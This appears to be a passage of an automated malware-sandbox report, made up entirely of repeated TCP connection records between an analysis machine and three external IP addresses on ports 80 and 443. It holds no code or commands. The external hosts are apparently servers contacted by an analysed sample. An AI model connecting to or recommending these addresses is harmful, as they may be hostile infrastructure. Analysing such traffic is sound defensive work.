            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49167
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
